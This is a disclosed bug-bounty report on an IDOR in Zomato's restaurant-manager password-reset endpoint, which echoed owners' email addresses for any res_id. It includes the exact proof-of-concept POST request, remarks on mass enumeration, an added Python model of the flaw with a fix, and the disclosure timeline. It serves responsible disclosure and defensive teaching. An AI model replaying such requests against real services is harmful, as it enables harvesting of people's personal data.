[www.zomato.com] Leaking Email Addresses of merchants via reset password feature
Summary by Zomato
Timeline
submitted a report to Zomato.
November 28, 2017, 5:09pm UTC
Hi Team,
Introduction
Found a cool IDOR, which again leaks the email addresses of all Zomato Users. This attack works no matter if you own the restaurant or not.
Proof of Concept
- The POST request below leaks the email addresses of the restaurant owners in the response:
Request
POST /php/restaurant_manager_reset_password.php HTTP/1.1
Host: www.zomato.com
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Referer: https://www.zomato.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <Your Cookies HERE>
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

res_id=2100935
Response
{"status":"success","message":"You will receive a recovery mail at ██████████@gmail.com, if it's in our database. Please check your inbox to start the password recovery process."}
- Now, testing with restaurants which I don't own (snapshot below): I purposely first found a restaurant which isn't active, then threw this request at that particular restaurant.
███████
- This means an attacker can extract millions of emails from Zomato's database. This would be a huge leak if an attacker gets access to this POST request.
Best Regards,
Prateek Tiwari
Impact
This can allow an attacker to extract all the emails from the Zomato database. A big leak. And we all know emails are of course the logins as well, so I would categorize this as a huge leak considering the nature of the business.
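Added example, not code from the report or from Zomato: a minimal Python model of the reset responder. It shows the disclosing behaviour described above (the account email echoed back for any res_id) beside a hardened version that returns one uniform message regardless of whether the id exists, plus a regression check a defender can run against responses. The OWNERS table, ids and addresses are constructed sample data.

```python
import re

# Constructed sample data standing in for the restaurant-owner table.
OWNERS = {
    2100935: "owner@example.com",
    4242: "other@example.com",
}

GENERIC_MESSAGE = ("If this account exists, a recovery mail has been sent to the "
                   "address on file. Please check your inbox.")

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")


def reset_response_vulnerable(res_id: int) -> dict:
    """Mirrors the behaviour in the report: the owner's email is placed in the
    response body, so anyone who can supply a res_id learns the address."""
    email = OWNERS.get(res_id)
    if email is None:
        return {"status": "failed", "message": "No such restaurant."}
    return {"status": "success",
            "message": f"You will receive a recovery mail at {email}, if it's in our database."}


def reset_response_fixed(res_id: int, outbox: list) -> dict:
    """Hardened: the email is used only server-side to send the mail (modelled by
    appending to `outbox`), and the HTTP response is identical for existing and
    non-existing ids, so it neither discloses the address nor allows enumeration."""
    email = OWNERS.get(res_id)
    if email is not None:
        outbox.append(email)
    return {"status": "success", "message": GENERIC_MESSAGE}


def response_leaks_email(resp: dict) -> bool:
    """Regression check: True if any field of a reset response contains an
    email-shaped token. Useful as an assertion in the endpoint's test suite."""
    return bool(EMAIL_RE.search(" ".join(str(v) for v in resp.values())))


def responses_are_uniform(res_ids: list) -> bool:
    """Enumeration check: True if the hardened endpoint answers every id identically."""
    bodies = {str(reset_response_fixed(r, [])) for r in res_ids}
    return len(bodies) == 1
```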
posted a comment.
November 28, 2017, 5:18pm UTC posted a comment.
December 12, 2017, 4:53am UTC
Hi @shreysinha This is still vulnerable :( Any update on this issue? Considering the fact that @zomato cares a lot about user info disclosure, this should be resolved by now at least?
Looking forward to hearing from you.
Best Regards,
Prateek Tiwari
posted a comment.
December 12, 2017, 2:03pm UTC
@shreysinha This is fixed now. While testing other issues on the same endpoint, I now receive a 404 Not Found error, which means the dev team removed this endpoint itself.
Best Regards,
Prateek Tiwari
closed the report and changed the status to Resolved.
December 13, 2017, 6:28am UTC rewarded prateek_0490 with a bounty.
December 19, 2017, 5:01am UTC requested to disclose this report.
February 11, 2021, 6:35pm UTC
Hi Team, It's been quite some time since @zomato has done any public disclosures, so I thought I would request a few disclosures. Please see if you can do a full disclosure with some redaction (sensitive stuff, if any), else I totally understand :)
Prateek
agreed to disclose this report.
February 18, 2021, 6:35am UTC This report has been disclosed.
February 18, 2021, 6:35am UTC changed the report title from [www.zomato.com] Leaking PIIs (All Email Addresses) Of All Zomato Users to [www.zomato.com] Leaking Email Addresses of merchants via reset password feature.
February 18, 2021, 9:11am UTC